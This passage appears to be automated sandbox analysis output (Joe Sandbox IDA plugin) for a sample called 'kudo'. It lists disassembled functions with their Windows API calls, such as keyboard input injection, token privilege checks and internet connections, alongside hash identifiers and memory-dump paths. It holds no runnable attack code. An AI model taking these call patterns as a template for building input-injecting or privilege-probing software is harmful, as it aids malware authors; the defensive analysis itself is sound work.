                                                      • Opcode Fuzzy Hash: 9e62178bf8113db74fe3e2223397d940bd3c4737a24273e58c91db6b204835c6
                                                      • Instruction Fuzzy Hash: D8D01234510713CFD7209F39D81C64676D4FF05751B51C879D5E5D6650EA78C890CB60
                                                      APIs
                                                      Strings
                                                      Similarity
                                                      • API ID: LocalTime__swprintf
                                                      • String ID: %.3d$WIN_XPe
                                                      • API String ID: 2070861257-2409531811
                                                      • Opcode ID: 61dc518b69cacd326b52e97e2f1b38c8ff2243921b15add77cb8f8b7d4db8922
                                                      • Instruction ID: 78336af2a5595c190af79073bbd07df62e9eb745dd565c2a161c13df3df6f09e
                                                      • Opcode Fuzzy Hash: 61dc518b69cacd326b52e97e2f1b38c8ff2243921b15add77cb8f8b7d4db8922
                                                      • Instruction Fuzzy Hash: 75D0177184511CFACF509B909C8D8F9737CFB18309F200562F622E2184E22A9BD4EB21
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                       • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3fdbd76c5f9fc92a8aeeecdfc1fd4ca7cbce33edf3c77cfb2a573e47f1a64a40
                                                      • Instruction ID: 0950dd940aa7409af175c3c6f85859d54f28744d209a78b1bb0c469aebb9c5a9
                                                      • Opcode Fuzzy Hash: 3fdbd76c5f9fc92a8aeeecdfc1fd4ca7cbce33edf3c77cfb2a573e47f1a64a40
                                                      • Instruction Fuzzy Hash: 47C16E74A0421AEFCB14CF98D884EAEBBB5FF48715B148598EC06EB251D730DD85DB90
                                                      APIs
                                                      • CharLowerBuffW.USER32(?,?), ref: 0087E0BE
                                                      • CharLowerBuffW.USER32(?,?), ref: 0087E101
                                                        • Part of subcall function 0087D7A5: CharLowerBuffW.USER32(?,?), ref: 0087D7C5
                                                      • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0087E301
                                                      • _memmove.LIBCMT ref: 0087E314
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                       • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: BuffCharLower$AllocVirtual_memmove
                                                      • String ID:
                                                      • API String ID: 3659485706-0
                                                      • Opcode ID: f508928fab092958d70e30da21e8daf9cb34d4d55f471ccd7ff08ae446cc7245
                                                      • Instruction ID: bf3b04339e06f49780b1deb4cfaf85c66851132e48a0f127b0bdec2e15cc9571
                                                      • Opcode Fuzzy Hash: f508928fab092958d70e30da21e8daf9cb34d4d55f471ccd7ff08ae446cc7245
                                                      • Instruction Fuzzy Hash: 84C14671A083019FC754DF28C88096ABBE4FF89718F14896EF999DB352D730E945CB92
                                                      APIs
                                                      • CoInitialize.OLE32(00000000), ref: 008780C3
                                                      • CoUninitialize.OLE32 ref: 008780CE
                                                        • Part of subcall function 0085D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?), ref: 0085D5D4
                                                      • VariantInit.OLEAUT32(?), ref: 008780D9
                                                      • VariantClear.OLEAUT32(?), ref: 008783AA
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                       • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                      • String ID:
                                                      • API String ID: 780911581-0
                                                      • Opcode ID: 6623b0368aef5c43fbc00e92ea7d02888d4cc5e23a61884d92162ee943cfb535
                                                      • Instruction ID: 35b8aaff4f89ee90e1e313422a419a5f3f0d5efcbbe7a14cd76035aa8761ea8c
                                                      • Opcode Fuzzy Hash: 6623b0368aef5c43fbc00e92ea7d02888d4cc5e23a61884d92162ee943cfb535
                                                      • Instruction Fuzzy Hash: 42A112756047019FCB40DF28C885A2AB7E4FF89764F148458F99ADB3A2CB30ED45CB92
                                                      APIs
                                                      • ProgIDFromCLSID.OLE32(?,00000000), ref: 008576EA
                                                      • CoTaskMemFree.OLE32(00000000), ref: 00857702
                                                      • CLSIDFromProgID.OLE32(?,?), ref: 00857727
                                                      • _memcmp.LIBCMT ref: 00857748
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                       • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: FromProg$FreeTask_memcmp
                                                      • String ID:
                                                      • API String ID: 314563124-0
                                                      • Opcode ID: 8e1fe12b8d2125876486a2aac9c4dc84881dd117c5c88303b2127cbb349aebdf
                                                      • Instruction ID: 67efe29e4a0c0a5b70115dc9bb5d24e4d57cab29b64df67633581ed82be01bd8
                                                      • Opcode Fuzzy Hash: 8e1fe12b8d2125876486a2aac9c4dc84881dd117c5c88303b2127cbb349aebdf
                                                      • Instruction Fuzzy Hash: BC810E75A00109EFCB04DFA8D984DEEB7B9FF89315F208558E505EB250DB71AE0ACB60
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                       • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Variant$AllocClearCopyInitString
                                                      • String ID:
                                                      • API String ID: 2808897238-0
                                                      • Opcode ID: ba4785c5112e5762931c9825c46bfbbad03fcd2323098225d34861080476cdc0
                                                      • Instruction ID: ed310cd6cf36d9749df4e1817d5ab54e29dac1bf4c8ea229b945625c0cb0e81b
                                                      • Opcode Fuzzy Hash: ba4785c5112e5762931c9825c46bfbbad03fcd2323098225d34861080476cdc0
                                                      • Instruction Fuzzy Hash: C051E7747003059ADF21AF69D89163AB7E5FF44315F60C81FE986DB292FA30D8588702
                                                      APIs
                                                      • GetWindowRect.USER32(00A15190,?), ref: 00889863
                                                      • ScreenToClient.USER32(00000002,00000002), ref: 00889896
                                                      • MoveWindow.USER32(?,?,?,?,000000FF,00000001), ref: 00889903
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                       • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Window$ClientMoveRectScreen
                                                      • String ID:
                                                      • API String ID: 3880355969-0
                                                      • Opcode ID: 794cf92ecd281896703142c694a9275089c3f439a18db07318068454f3bb608c
                                                      • Instruction ID: 82843319f3240ec750f0f96441f5bd63405173d071f95881112abf117739454e
                                                      • Opcode Fuzzy Hash: 794cf92ecd281896703142c694a9275089c3f439a18db07318068454f3bb608c
                                                      • Instruction Fuzzy Hash: 61510B74A00209AFCF10DF68C884ABE7BB5FF55360F148269F995DB2A0D731AD81CB90
                                                      APIs
                                                      • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00859AD2
                                                      • __itow.LIBCMT ref: 00859B03
                                                        • Part of subcall function 00859D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00859DBE
                                                      • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00859B6C
                                                      • __itow.LIBCMT ref: 00859BC3
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                       • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$__itow
                                                      • String ID:
                                                      • API String ID: 3379773720-0
                                                      • Opcode ID: 4c7f9864d42e9b24e135cd0b1eb43596fc9d0c921e054c355223ac21600b1bf2
                                                      • Instruction ID: 235594aace9a57f74a94394187a179984a8379b1505e50dae520ec767bf47d26
                                                      • Opcode Fuzzy Hash: 4c7f9864d42e9b24e135cd0b1eb43596fc9d0c921e054c355223ac21600b1bf2
                                                      • Instruction Fuzzy Hash: B8414F74A00218ABEF11EF58DC45BEE7BB9FF44725F000059FD45E6291DB74A948CB62
                                                      APIs
                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0086B89E
                                                      • GetLastError.KERNEL32(?,00000000), ref: 0086B8C4
                                                      • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0086B8E9
                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0086B915
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                       • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: CreateHardLink$DeleteErrorFileLast
                                                      • String ID:
                                                      • API String ID: 3321077145-0
                                                      • Opcode ID: e6c6a75089b37cc8bbe6923e99ee592b7d66ccb38b350096bc13e145509cbe47
                                                      • Instruction ID: 37a2a948d87f0e30625dcd038e33fc7b27802e09ea8168b6502395d2c7125412
                                                      • Opcode Fuzzy Hash: e6c6a75089b37cc8bbe6923e99ee592b7d66ccb38b350096bc13e145509cbe47
                                                      • Instruction Fuzzy Hash: F841E875600511DFCB51DF19C445A59BBA1FF49314F15C098ED8AEB3A2CB30ED41CB92
                                                      APIs
                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 008888DE
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                       • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: InvalidateRect
                                                      • String ID:
                                                      • API String ID: 634782764-0
                                                      • Opcode ID: a7b3612107a510aaf5dc453987a412fc9808604bb4bf1661208048ae140e70ac
                                                      • Instruction ID: a0defdf04c5dc2e8b6ebe81832a75b2cf909aef4370541f4b10e455fd1258fc4
                                                      • Opcode Fuzzy Hash: a7b3612107a510aaf5dc453987a412fc9808604bb4bf1661208048ae140e70ac
                                                      • Instruction Fuzzy Hash: 80319234640109EFEF20BA68CC45FB97BB5FB09360FD44122FA55E62A1CF70E9809B56
                                                      APIs
                                                      • ClientToScreen.USER32(?,?), ref: 0088AB60
                                                      • GetWindowRect.USER32(?,?), ref: 0088ABD6
                                                      • PtInRect.USER32(?,?,0088C014), ref: 0088ABE6
                                                      • MessageBeep.USER32(00000000), ref: 0088AC57
Memory Dump Source
• Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
• Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Rect$BeepClientMessageScreenWindow
                                                      • String ID:
                                                      • API String ID: 1352109105-0
                                                      • Opcode ID: aa651fe3e5a56a5fbc48da9d41ce427a0b8502ba1a5a6e92a397cd20928c60a1
                                                      • Instruction ID: 6e7815c46c6c6d3cce7b0e297ab74c26a80270b413c053ec92405af2512b861d
                                                      • Opcode Fuzzy Hash: aa651fe3e5a56a5fbc48da9d41ce427a0b8502ba1a5a6e92a397cd20928c60a1
                                                      • Instruction Fuzzy Hash: CD416D30600519DFEF19EF58D884B6A7BF6FF49310F1881AAE915DB2A1D731E841CB92
                                                      APIs
                                                      • GetKeyboardState.USER32(?), ref: 00860B27
                                                      • SetKeyboardState.USER32(00000080), ref: 00860B43
                                                      • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00860BA9
                                                      • SendInput.USER32(00000001,00000000,0000001C), ref: 00860BFB
                                                      Similarity
                                                      • API ID: KeyboardState$InputMessagePostSend
                                                      • String ID:
                                                      • API String ID: 432972143-0
                                                      • Opcode ID: cb28cde595bbed39ce6bdfae03d488c8e3d6af0338974d186b5a531a1b207f41
                                                      • Instruction ID: eca9f9db6163f7d45ac8b82c6cdaeadaaf2eadccdcde3f319a616722e8168b3d
                                                      • Opcode Fuzzy Hash: cb28cde595bbed39ce6bdfae03d488c8e3d6af0338974d186b5a531a1b207f41
                                                      • Instruction Fuzzy Hash: 3C313730940218AEFB308B698C05BFBBBA6FB45339F18835AE581D21D2C7758D449B5A
                                                      APIs
                                                      • GetKeyboardState.USER32(?), ref: 00860C66
                                                      • SetKeyboardState.USER32(00000080), ref: 00860C82
                                                      • PostMessageW.USER32(00000000,00000101,00000000), ref: 00860CE1
                                                      • SendInput.USER32(00000001,?,0000001C), ref: 00860D33
                                                      Similarity
                                                      • API ID: KeyboardState$InputMessagePostSend
                                                      • String ID:
                                                      • API String ID: 432972143-0
                                                      • Opcode ID: 4c314b8977809cb9ed292a3a3543e1cf29b6fd32e79c575b8c8fd29c61f490f8
                                                      • Instruction ID: 63e21bcf501d16b3341e77874b2ca88c06d962f006a73cd292a0267e67901fbb
                                                      • Opcode Fuzzy Hash: 4c314b8977809cb9ed292a3a3543e1cf29b6fd32e79c575b8c8fd29c61f490f8
                                                      • Instruction Fuzzy Hash: 0131353094021C6EFF348B688804BBFBB66FB45310F15431AE581D21D2C7359D45CB5A
                                                      APIs
                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 008361FB
                                                      • __isleadbyte_l.LIBCMT ref: 00836229
                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00836257
                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0083628D
                                                      Similarity
                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                      • String ID:
                                                      • API String ID: 3058430110-0
                                                      • Opcode ID: 269f377e79595205de0e5b7bf50ffd08c51111c838a25eccb2a1dc85b320a3b0
                                                      • Instruction ID: fa9b39869ea4a1804b0a33569817e8c295c5708dcb785262cbbe21f131c1b247
                                                      • Opcode Fuzzy Hash: 269f377e79595205de0e5b7bf50ffd08c51111c838a25eccb2a1dc85b320a3b0
                                                      • Instruction Fuzzy Hash: 7531A031604256BFDF218F69CC48BAB7BB9FF82310F168129E864D7191EB31D960D790
                                                      APIs
                                                      • GetForegroundWindow.USER32 ref: 00884F02
                                                        • Part of subcall function 00863641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0086365B
                                                        • Part of subcall function 00863641: GetCurrentThreadId.KERNEL32(00000000,?,00865005), ref: 00863662
                                                        • Part of subcall function 00863641: AttachThreadInput.USER32(00000000,?,00865005), ref: 00863669
                                                      • GetCaretPos.USER32(?), ref: 00884F13
                                                      • ClientToScreen.USER32(00000000,?), ref: 00884F4E
                                                      • GetForegroundWindow.USER32 ref: 00884F54
                                                      Similarity
                                                      • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                      • String ID:
                                                      • API String ID: 2759813231-0
                                                      • Opcode ID: 8da7887ceff9f778ed91c31e7231cfbd9b0e9f153eb27cb3539dfbcf9cc0d789
                                                      • Instruction ID: 9a63ea80b78e3b997452ba6cc8fbeb2299f70df88cb65cc4db944e6108e7ca3f
                                                      • Opcode Fuzzy Hash: 8da7887ceff9f778ed91c31e7231cfbd9b0e9f153eb27cb3539dfbcf9cc0d789
                                                      • Instruction Fuzzy Hash: 84310F71D00108AFDB40EFA9CC859EFB7F9FF95304F10406AE555E7242DA719E458BA1
                                                      APIs
                                                        • Part of subcall function 0085810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00858121
                                                        • Part of subcall function 0085810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0085812B
                                                        • Part of subcall function 0085810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0085813A
                                                        • Part of subcall function 0085810A: RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 00858141
                                                        • Part of subcall function 0085810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00858157
                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 008586A3
                                                      • _memcmp.LIBCMT ref: 008586C6
                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 008586FC
                                                      • HeapFree.KERNEL32(00000000), ref: 00858703
                                                      Similarity
                                                      • API ID: Heap$InformationProcessToken$AllocateErrorFreeLastLookupPrivilegeValue_memcmp
                                                      • String ID:
                                                      • API String ID: 2182266621-0
                                                      • Opcode ID: 87a692b93412ea4e992cf9cce4bfc3bad55eab7254cf18932366cd98c6ef37d5
                                                      • Instruction ID: c5efa954c130ec3da3be79a38c571d2e6b36be4e6cbb7d16a5dff323cddba2d3
                                                      • Opcode Fuzzy Hash: 87a692b93412ea4e992cf9cce4bfc3bad55eab7254cf18932366cd98c6ef37d5
                                                      • Instruction Fuzzy Hash: BA214671A41109EBDB10DFA8C989BAEB7F8FB54306F15405AE844AB241DB30AA09CB90
                                                      APIs
                                                      • __setmode.LIBCMT ref: 008209AE
                                                        • Part of subcall function 00805A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00867896,?,?,00000000), ref: 00805A2C
                                                        • Part of subcall function 00805A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00867896,?,?,00000000,?,?), ref: 00805A50
                                                      • _fprintf.LIBCMT ref: 008209E5
                                                      • OutputDebugStringW.KERNEL32(?), ref: 00855DBB
                                                        • Part of subcall function 00824AAA: _flsall.LIBCMT ref: 00824AC3
                                                      • __setmode.LIBCMT ref: 00820A1A
                                                      Similarity
                                                      • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                      • String ID:
                                                      • API String ID: 521402451-0
                                                      • Opcode ID: 88835fda1c92e4077192062d843d9741e3fdfeef8a54bd3cb0b240720a7a1590
                                                      • Instruction ID: 3b3b43ef75a95017bbeff3d1feeec9871b1b20fd2651b91c3c9090c8cd8eea8f
                                                      • Opcode Fuzzy Hash: 88835fda1c92e4077192062d843d9741e3fdfeef8a54bd3cb0b240720a7a1590
                                                      • Instruction Fuzzy Hash: 36112B726041246FDB04B6BCBC479BE77A8FF45310F644125F106D61C3EE6058C54BB2
                                                      APIs
                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 008717A3
                                                        • Part of subcall function 0087182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0087184C
                                                        • Part of subcall function 0087182D: InternetCloseHandle.WININET(00000000), ref: 008718E9
                                                      Similarity
                                                      • API ID: Internet$CloseConnectHandleOpen
                                                      • String ID:
                                                      • API String ID: 1463438336-0
                                                      • Opcode ID: d4f91a5cf545a76aa742cf90d649520fb6c9403541e80060cf488bbfe51be6b6
                                                      • Instruction ID: 5e148e17df2635453f15e02281074165bff86d92f8cbab45fd431f8694a45616
                                                      • Opcode Fuzzy Hash: d4f91a5cf545a76aa742cf90d649520fb6c9403541e80060cf488bbfe51be6b6
                                                      • Instruction Fuzzy Hash: 6721F631200605BFEF169F68CC45FBABBA9FF48711F10802EFA19D6955D771D810A7A1
                                                      APIs
                                                      • GetFileAttributesW.KERNEL32(?,0088FAC0), ref: 00863A64
                                                      • GetLastError.KERNEL32 ref: 00863A73
                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 00863A82
                                                      • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0088FAC0), ref: 00863ADF
                                                      Similarity
                                                      • API ID: CreateDirectory$AttributesErrorFileLast
                                                      • String ID:
                                                      • API String ID: 2267087916-0
                                                      • Opcode ID: ef2bf2721b2c7bb7e5acf1463dde15da5a7b45dd6d5155c5dd33e5c04abbfe56
                                                      • Instruction ID: 802f4622443a5caaa06a73176d5c1cc44db1f3e11ada6d5cd390f9fa2a7bdfa5
                                                      • Opcode Fuzzy Hash: ef2bf2721b2c7bb7e5acf1463dde15da5a7b45dd6d5155c5dd33e5c04abbfe56
                                                      • Instruction Fuzzy Hash: 5E21B1305086118FC300EF28D88186BBBE4FE55368F144A2DF4A9C72E2D7319A06DB52
                                                      APIs
                                                      • _free.LIBCMT ref: 00835101
